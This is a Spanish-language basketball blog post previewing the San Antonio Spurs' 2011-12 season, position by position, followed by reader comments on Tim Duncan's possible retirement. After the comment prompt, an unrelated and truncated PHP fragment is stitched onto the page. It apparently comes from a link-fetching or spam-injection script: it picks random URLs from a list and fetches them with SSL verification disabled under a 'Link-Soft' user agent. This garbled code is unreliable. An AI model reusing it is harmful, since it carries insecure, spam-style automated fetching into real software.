San Antonio Spurs: Fin de ciclo

02 de January de 2012 por Love Denise

29 de abril de 2010. Para la mayoría, esa fecha no significa absolutamente nada pero para Gregg Popovych y los suyos esa fecha comportó el comienzo de sus vacaciones la temporada pasada. Esa noche, los Spurs cayeron eliminados contra todo pronóstico ante los Grizzlies por un contundente 4-2.

Aparte de lo dolorosa que puede resultar una eliminación, la sufrida ante los “ositos” fue más trágica aún por las circunstancias en que se produjo. Por un lado, los Spurs llegaban como claros favoritos para llevarse la serie. Habían liderado de forma apabullante el Oeste. Su regular season había sido sobresaliente, finalizando con un balance de 61-21 que les sirvió para ser primeros de conferencia y conseguir así el factor cancha en la serie. En cambio, los Grizzlies, tras varios años deambulando por el Oeste, habían conseguido gracias a una brillante temporada, hacerse con el último billete del Oeste para los Playoffs. Pero la ausencia por lesión de su estrella Rudy Gay, el hecho de que en sus anteriores participaciones en Playoffs habiuran sido vapuleados con rotundos 4-0, y la inexperiencia de la mayoría de sus jugadores frente a los experimentados tejanos, les hacían llegar a la serie con escasas opciones a llevársela. Pero los Grizzlies anularon todas las armas de los Spurs, y superaron a su rival en todas las facetas del juego. Zach y Marc se zamparon a Tim Duncan, el cual estuvo muy solo en la pintura. El semidesconocido Sam Young, el resucitado Tony Allen y el veterano Shane Battier frenaron a Ginobili; y Parker se encontró en frente con la mejor versión vista hasta hoy de Mike Conley.

A raíz de esta eliminación, se hizo más que evidente que el laureado ciclo tejano estaba llegando a su fin. Y en esta tesitura comienza esta nueva temporada, presumiblemente la última del ciclo victorioso protagonizado por los Spurs en la última década. Sea cual sea el resultado, parece evidente que la temporada que viene, la plantilla necesitará una remodelación y un rejuvenecimiento de los hombres-franquicias de su equipo.

En la posición de base, el francés Tony Parker volverá a ser el guía de su equipo. La edad de las otras dos grandes estrellas le obligará a asumir cada vez más el papel de hombre franquicia y líder de los Spurs, debiéndose echar a la espalda el equipo cuando las cosas pinten mal. En esta posición, los Spurs han sufrido la importantísima baja de George Hill, su sexto hombre la pasada campaña y, por momentos, pieza clave del equipo ya que ofrecía buenos minutos de descanso a Parker y minutos de calidad jugando como escolta. Este año, el segundo base será TJ Ford, cuyo rendimiento en los últimos años ha sido bastante deplorable lastrado por problemas físicos y un largo historial de graves lesiones. El rookie Cory Joseph, pick 29 del último draft, partirá como tercer base e intentará arrebatar algunos minutos al bueno de TJ.

Las alas volverán a estar comandadas por Richard Jefferson y Manu Ginobili. El argentino, pese a sus 34 años, todavía es capaz de dar lecciones magistrales de calidad, fundamentos, inteligencia y entendimiento del juego. En cambio, Jefferson se ha convertido en uno de los mayores fracasos de los Spurs en los últimos años. A años luz de aquel jugador que brillaba en los Nets, su temporada pasada fue mediocre pero su serie de Playoffs contra los Grizzlies fue aún peor: 6’5 puntos, 4 rebotes y menos de una asistencia en 29 minutos por partido, números ridículos para un jugador de su categoría y caché, al que aún le quedan casi 30 millones de dólares por cobrar durante las próximas tres temporadas. Durante esta mini-pretemporada, su nombre sonó con fuerza en la lista de posibles jugadores amnistiados. Finalmente, los Spurs declinaron tomar esa decisión… de momento.

Como suplentes nos encontramos a Gary Neal, el cual cuajó una magnífica temporada como rookie la temporada pasada, yéndose a los 10 puntos de media con magníficos porcentajes tanto en tiros de 2 como en triples. Lamentablemente una apendicitis le obligará a perderse el primer tramo de la competición. Completan el perimetro 3 jóvenes jugadores: El sophomore James Anderson, cuyo rol debe crecer mientras Neal esté de baja, Danny Green, un decente tirador de tres puntos, y el rookie Kawhi Leonard, pick 15 del último draft y que llegó en la operación en la que el citado George Hill puso rumbo a Indiana.

Y en la pintura, nos encontramos la parte más débil del equipo, no tanto por calidad, que hay de sobra sinó por cantidad y estado físico de sus jugadores.

Como no podía ser menos, el gran Tim Duncan será la gran referencia interior del equipo. Pero los años no pasan en balde y cuando los Playoffs comiencen, el bueno de Tim ya contará con 36 primaveras. Su rendimiento ya no es el de hace unos años, aquel que le convertía en el mejor jugador interior de la NBA y posiblemente en el mejor 4 de la historia. Además en esta temporada con tantos partidos en tan pocos días a causa del maldito lockout, Gregg Popovych tendrá que hacer encaje de bolillos para dosificarle y que llegue lo más fresco posible a finales de abril. Su compañero de fatigas en la pintura será DeJuan Blair, jugador con muchísima calidad, pero cuya escasa altura y sus problemas de ligamentos merman sus prestaciones

En el banco, esperando su oprtunidad está el brasileño Tiago Splitter. Su temporada como rookie estuvo marcada por la falta de confianza y continuidad que Popovych le otorgó pero como ya hemos indicado, la necesidad de dosificar a Duncan y la escasa batería de hombres altos con los que cuentan los tejanos, harán que el brasileño cuente con más minutos este año. Su explosión o no, puede marcar el devenir y el futuro del equipo. Completa la pintura Matt Bonner, cuyo rol es el de situarse en el perímetro e intentar romper el partido a base de triples. Su tiro de tres es su único recurso. Cuando está acertado desde más allá del arco, se convierte en una arma letal para los tejanos. Cuando no, no tiene mucho más que ofrecer a su equipo.

Resumiendo, esta temporada será la última de un gran ciclo ganador protagonizado por los Spurs en la última década. La acumulación de partidos debido al lockout será muy perjudicial para un equipo poco físico y donde dos de sus hombres claves superan ampliamente la barrera de los 30 años. Por tanto, su objetivo debería ser entrar en playoffs, despedir lo más dignamente posible esta era, y a partir del próximo verano dejar que la pelota caiga en el tejado del General Manager que tendrá la dura labor de reconstruir un equipo ganador.

Quinteto: Tony Parker, Manu Ginobili, Richard Jefferson, Tim Duncan, DeJuan Blair
Sexto hombre: Gary Neal / Thiago Splitter

Pronóstico: 6-8 del Oeste y eliminados en primera ronda de Playoffs.

Comenta

17 comentarios a esta entrada

  1. Ru dice:
    #1

    Beasley o Cousins a los Spurs! xDD

    La franquicia más “obrera” que mis ojos hayan podido ver,esa que hacía faltas tácticas para llevar a la línea de personal al peor jugador del equipo rival en ese aspecto o la que más administraba los minutos de sus estrellas,el equipo que mejor rendimiento le daba a su falso 6º hombre dándole 3x minutos por partido o ese que te asustaba cuando llegaba el año par,esa leyenda llamada Duncan,el talento a raudales de Manudo…

    Siguen con los mismos pilares pero con el problema de los kms en las piernas de sus principales jugadores y tampoco se vislumbra entre sus elecciones de draft jugadores que opositen a ese rol,aunque sin duda saben elegir y bien en los Spurs.Curiosamente el primer título llegó tras el lockout del 98 y puede ser que se acabe el “periodo Duncan” tras este segundo lockout.

      Citar

  2. rumbero dice:
    #2

    Ru:
    Beasley o Cousins a los Spurs! xDD

    Pues no estaría nada mal que antes que se retire Duncan, enganchará a estos dos niñatos y les enseñará cuatro cosas tanto dentro como fuera de la pista.

    La verdad es que cada año asustan un poco menos los Spurs. Siguen siendo un señor equipo, solo hay que recordar la RS de la temporada pasada, pero da la impresión que a una serie un poco larga y exigente les va a faltar un plus. Aun asi me pasa como con Boston y no soy capaz de darlos por acabados. Capaces son de quedar entre el 6-8 como dice Denise y luego liarla. Manudo y Parker son siempre un peligro y al bueno de Tim aun le quedan un par de tiros por pegar. Lástima del bluf de Jefferson… Vaya, a mi me gustaría que este equipo de leyenda muriera matando antes de empezar con la reconstrucción después de la era Duncan

      Citar

  3. nach dice:
    #3

    rumbero:

    Pues no estaría nada mal que antes que se retire Duncan, enganchará a estos dos niñatos y les enseñará cuatro cosas tanto dentro como fuera de la pista.

    Eso venía a decir yo, entre Duncan y Ginobili los centran en menos que canta un gallo xD

      Citar

  4. Blade Petrovic dice:
    #4

    Lo que quería decir es que en mip de e st año lo ganara ty lawson o harden el de 2013 para favors(si hay mundo)

      Citar

  5. Blade Petrovic dice:
    #5

    Podriais sacar una aplicacion de tjnba para el movil

      Citar

  6. Denise dice:
    #6

    Yo creo que Duncan debe retirarse esta temporada.
    Primero porque jugar la próxima temporada signifiacaría arrastrarse por las canchas y dejar una pesima imagen de lo que ha sido. Hay que saber retirarse a tiempo.
    Segundo porque los Spurs no tendran a corto plazo opciones de titulo
    Tercero, podría irse de los Spurs y fichar como agente libre por un proyecto ganador (imaginad Duncan en Miami el año que viene). Pero prostituirse de esa manera por otro anillo más despues de toda su vida en los Spurs significaría que muchos quemasen su camiseta.

    Sobre los Spurs, empezaría ya este año a reconstruir. Antes de que Jefferson y Ginobili se devaluen más, a éstos dos los traspasaba por jovenzuelos. A Duncan no lo renovaba, mas que nada por dignidad hacia él, y quizás me quedaría solo con Parker.

      Citar

  7. melo15 dice:
    #7

    Totalmente de acuerdo contigo Denise, si Duncan se retira esta temporada, acabara su carrera dignamente, cayendo en playoff (o noXD) si no el año que viene alomejor los Spurs no se clasifican a playoffs y…
    Desde luego nada de irse a los Heat, ademas para que , ya ha ganado 3 anillos.
    Y acabaria su carrera mejor que Ewing,o otros Pivots, en Playoffs, dandolo todo

      Citar

  8. nach dice:
    #8

    Los Heat con Duncan serían una fuerza descomunal, pero no creo que lo haga, no pega con el tipo de jugador que ha sido Duncan el abandonar a su equipo (porque es SU equipo) por intentar arañar otro anillo más.

    Eso sí, yo no lo daría por muerto todavía, puede ser un 6º hombre o jugador de rotación más que digno, para jugar sus 15-20 minutos por partido a un gran nivel, cobrando acorde a eso y de esta forma permitiendo a San Antonio el reforzarse adecuadamente para iniciar la reconstrucción contando con su ayuda.

      Citar

  9. Cocinitas dice:
    #9

    melo15:
    Totalmente de acuerdo contigo Denise, si Duncan se retira esta temporada, acabara su carrera dignamente, cayendo en playoff (o noXD) si no el año que viene alomejor los Spurs no se clasifican a playoffs y…
    Desde luego nada de irse a los Heat, ademas para que , ya ha ganado 3 anillos.
    Y acabaria su carrera mejor que Ewing,o otros Pivots, en Playoffs, dandolo todo

    Son cuatro los anillos de este jugadorazo.

      Citar

  10. melo15 dice:
    #10

    Perdon, aunque nose, tan bueno era Duncan, porque siempre ha estado bien acompañado, primero con “el almirante” y despues con Parker y Ginobili

      Citar

  11. Denise dice:
    #11

    nach:
    Los Heat con Duncan serían una fuerza descomunal, pero no creo que lo haga, no pega con el tipo de jugador que ha sido Duncan el abandonar a su equipo (porque es SU equipo) por intentar arañar otro anillo más.

    Eso sí, yo no lo daría por muerto todavía, puede ser un 6º hombre o jugador de rotación más que digno, para jugar sus 15-20 minutos por partido a un gran nivel, cobrando acorde a eso y de esta forma permitiendo a San Antonio el reforzarse adecuadamente para iniciar la reconstrucción contando con su ayuda.

    Eso es a lo que me refiero, podría prostituirse a Miami, Lakers, Chicago o similar y sería lícito pero no pega con el estilo y clase de jugador que es.
    Está claro que la temporada que viene podría ser un buen 6º hombre, pero….teniendo en cuenta que todos pensamos que no jugaría en otro equipo que no fuera los Spurs, y que éstos ya no dan más de sí…¿no sería mejor retirarse ahora?, en vez de empezar a tragarse mates en la cara y gorros de cualquier piltrafilla…

      Citar

  12. rumbero dice:
    #12

    melo15: Perdon, aunque nose, tan bueno era Duncan, porque siempre ha estado bien acompañado, primero con “el almirante” y despues con Parker y Ginobili

    Una cosa no quita la otra Melo. Siempre ha estado muy bien acompañado pero estamos hablando de uno de los mejores de la historia. Promediando más de 20-10 durante toda su carrera. 4 anillos. 3 MVP en finales (solo lo habían hecho Jordan, Johnson y O’Neal). Una delicia verlo jugar a baloncesto. Un crack fuera y dentro. Todo un símbolo vaya…

    Y como bien dice Denise, no creo que se mueva e los Spurs porque es SU equipo. Creo que dependerá bastante como acabe esta temporada para ver si continua una más. Que gane un quinto anillo y asi se puede retirar tranquilo

      Citar

  13. Blade Petrovic dice:
    #13

    Coincido con Denise porqe sino acabara como Shaq buscando el anillo.A mí me parecio un final muy triste el de shaq q acabo buscando el anillo con un muy mal itmo y bajando sus medias q eran historicas

      Citar

  14. MrGoesar dice:
    #14

    Un pequeño apunte sin importa que no sé si alguien ya habrá hecho. La fecha fue el 29 de abril de 2011, no 2010*

      Citar

  15. melo15 dice:
    #15

    Tienes razon Blade, Shaq para mi tiro un poco su carrera y le falto asentar-se en eu equipo, pero el tio independientemente de eso es buenisimo y uno de los 50 mejores jugadores de la historia

      Citar

  16. nach dice:
    #16

    melo15:
    Tienes razon Blade, Shaq para mi tiro un poco su carrera y le falto asentar-se en eu equipo, pero el tio independientemente de eso es buenisimo y uno de los 50 mejores jugadores de la historia

    Shaq? en su posición puede que sea un top5, un top 10 segurísimo.

    Respecto a lo de Duncan, dinero tendrá de sobra, así que no creo que ponga muchos problemas a una renovación como 6º hombre cobrando 4 duros que le permita ayudar a la franquicia durante, pongamos 2 o 3 años más jugando sus 15-20 minutos por noche y que el equipo se vaya reconstruyendo

      Citar

  17. Rompe dice:
    #17

    Impresionante este equipo, donde está y donde se esperaba que estuviera a principios de temporada… Como bien dicen por ahí, el GM tiene tanto mérito como Popovich. Qué “jugones” en sus puestos!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>